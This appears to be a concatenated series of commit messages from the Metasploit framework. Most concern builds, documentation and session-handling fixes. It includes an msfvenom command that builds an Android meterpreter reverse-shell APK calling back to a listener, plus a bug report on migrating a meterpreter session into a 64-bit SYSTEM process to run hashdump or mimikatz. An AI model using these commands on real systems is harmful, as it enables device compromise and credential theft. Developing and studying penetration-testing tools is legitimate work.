* Project system updated to VS 2013.
* Clean builds, had to remove a bunch of warnings.
* `make.bat` for building from the command line.
* Removed RDI stuff that shouldn't be there any more.
* Renamed the x86 DLL to include the platform name.
This makes x86 more consistent with x64.
Also replaces a bunch of instances of:
File.join(Msf::Config.install_root, 'data', ...)
with the simpler
File.join(Msf::Config.data_directory, ...)
[See rapid7/meterpreter#19]
Meterpreter Error: Uninitialized Constant Error Prevents a 32bit Meterpreter session from migrating to a 64bit process.
Discovered: September 9th 2013
Fixed: September 11th 2013 By MosDefAssassin
Contact:ara1212@gmail.com
Tested on Windows 2008 R2 SP1 Running as a Domain Controller
Issue:
An issue has been discovered when you have created a simple 32bit windows/meterpreter/reverse_tcp payload and have launched the payload on the victim to obtain a remote meterpreter session. While in this session you attempt to migrate your 32bit process over to a 64bit process in order to take advantage of tools like hashdump or mimikatz or obtain system level access under a 64bit process that runs as system such as dns.exe. However when you attempt to migrate to a 64bit process you receive the following error:
Error running command migrate: NameError uninitialized constant Msf::Payload::Windows::ReflectiveDllInject_x64
Cause and Resolution:
This issue occurs because the meterpreter.rb file that is being called from within
“/opt/metasploit/apps/pro/msf3/modules/payloads/stages/windows/” folder
does not contain the following classes:
require 'msf/core/payload/windows/x64/reflectivedllinject'
require 'msf/base/sessions/meterpreter_x64_win'
Once you add these two classes to the meterpreter.rb file, you will be able to migrate to 64bit processes from a basic msfpayload generated 32bit meterpreter payload.
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
Squashed commit of the following:
commit 2f4e8df33c5b4baa8d6fd67b400778a3f93482aa
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 16:31:03 2012 -0700
Clean up some rdoc comments
This adds categories for the various interfaces that meterpreter and
shell sessions implement so they are grouped logically in the docs.
commit 9d31bc1b35845f7279148412f49bda56a39c9d9d
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 13:00:25 2012 -0700
Combine the docs into one output dir
There's really no need to separate the API sections into their own
directory. Combining them makes it much easier to read.
commit eadd7fc136a9e7e4d9652d55dfb86e6f318332e0
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 08:27:22 2012 -0700
Keep the order of iface attributes the same accross rubies
1.8 doesn't maintain insertion order for Hash keys like 1.9 does so we
end up with ~random order for the display with the previous technique.
Switch to an Array instead of a Hash so it's always the same.
commit 6f66dd40f39959711f9bacbda99717253a375d21
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 08:23:35 2012 -0700
Fix a few more compiler warnings
commit f39cb536a80c5000a5b9ca1fec5902300ae4b440
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 08:17:39 2012 -0700
Fix a type-safety warning
commit 1e52785f38146515409da3724f858b9603d19454
Author: James Lee <egypt@metasploit.com>
Date: Mon Feb 27 15:21:36 2012 -0700
LHOST should be OptAddress, not OptAddressRange
commit acef978aa4233c7bd0b00ef63646eb4da5457f67
Author: James Lee <egypt@metasploit.com>
Date: Sun Feb 26 17:45:59 2012 -0700
Fix a couple of warnings and a typo
commit 29d87f88790aa1b3e5db6df650ecfb3fb93c675b
Author: HD Moore <hdm@digitaloffense.net>
Date: Mon Feb 27 11:54:29 2012 -0600
Fix ctype vs content_type typo
commit 83b5400356c47dd1973e6be3aa343084dfd09c73
Author: Gregory Man <man.gregory@gmail.com>
Date: Sun Feb 26 15:38:33 2012 +0200
Fixed scripts/meterpreter/enum_firefox to work with firefox > 3.6.x
commit 49c2c80b347820d02348d694cc71f1b3028b4365
Author: Steve Tornio <swtornio@gmail.com>
Date: Sun Feb 26 07:13:13 2012 -0600
add osvdb ref
commit e18e1fe97b89c3a2b8c22bc6c18726853d2c2bee
Author: Matt Andreko <mandreko@gmail.com>
Date: Sat Feb 25 18:02:56 2012 -0500
Added aspx target to msfvenom. This in turn added it to msfencode as well.
Ref: https://github.com/rapid7/metasploit-framework/pull/188
Tested on winxp with IIS in .net 1.1 and 2.0 modes
commit e6aa5072112d79bbf8a4d2289cf8d301db3932f5
Author: Joshua J. Drake <github.jdrake@qoop.org>
Date: Sat Feb 25 13:00:48 2012 -0600
Fixes#6308: Fall back to 127.0.0.1 when SocketError is raised from the resolver
commit b3371e8bfe
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 17:07:42 2012 -0700
Simplify logic for whether an inner iface has the same address
commit 5417419f35
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 16:58:16 2012 -0700
Whitespace
commit 9036875c29
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 16:53:45 2012 -0700
Set session info before worrying about address
get_interfaces can take a while on Linux, grab uid and hostname earlier
so we can give the user an idea of what they popped as soon as possible.
commit f34b51c629
Author: James Lee <egypt@metasploit.com>
Date: Tue Feb 28 16:48:42 2012 -0700
Clean up rdoc
commit e61a066345
Author: HD Moore <hd_moore@rapid7.com>
Date: Tue Feb 28 04:54:45 2012 -0600
Ensure the architecture is only the first word (not the full WOW64
message in some cases)
commit 4c70161097
Author: HD Moore <hd_moore@rapid7.com>
Date: Tue Feb 28 04:49:17 2012 -0600
More paranoia code, just in case RHOST is set to whitespace
commit c5ff89fe3d
Author: HD Moore <hd_moore@rapid7.com>
Date: Tue Feb 28 04:47:01 2012 -0600
A few more small bug fixes to handle cases with an empty string target
host resulting in a bad address
commit 462d0188a1
Author: HD Moore <hd_moore@rapid7.com>
Date: Tue Feb 28 03:55:10 2012 -0600
Fix up the logic (reversed by accident)
commit 2b2b0adaec
Author: HD Moore <hd_moore@rapid7.com>
Date: Mon Feb 27 23:29:52 2012 -0600
Automatically parse system information and populate the db, identify and
report NAT when detected, show the real session_host in the sessions -l
listing
commit 547a4ab4c6
Author: HD Moore <hd_moore@rapid7.com>
Date: Mon Feb 27 22:16:03 2012 -0600
Fix typo introduced
commit 27a7b7961e
Author: HD Moore <hd_moore@rapid7.com>
Date: Mon Feb 27 22:11:38 2012 -0600
More session.session_host tweaks
commit e447302a1a
Author: HD Moore <hd_moore@rapid7.com>
Date: Mon Feb 27 22:08:20 2012 -0600
Additional tunnel_peer changes
commit 93369fcffa
Author: HD Moore <hd_moore@rapid7.com>
Date: Mon Feb 27 22:06:21 2012 -0600
Additional changes to session.session_host
commit c3552f66d1
Author: HD Moore <hd_moore@rapid7.com>
Date: Mon Feb 27 22:00:19 2012 -0600
Merge changes into the new branch
This will make it easier to hopefully track down bugs.
exploitme-posix.c - make complete stack executable. On some kernel versions, execstack doesn't do the trick.
git-svn-id: file:///home/svn/framework3/trunk@10485 4d416f70-5f16-0410-b530-b9f4589650da
Chris Doughty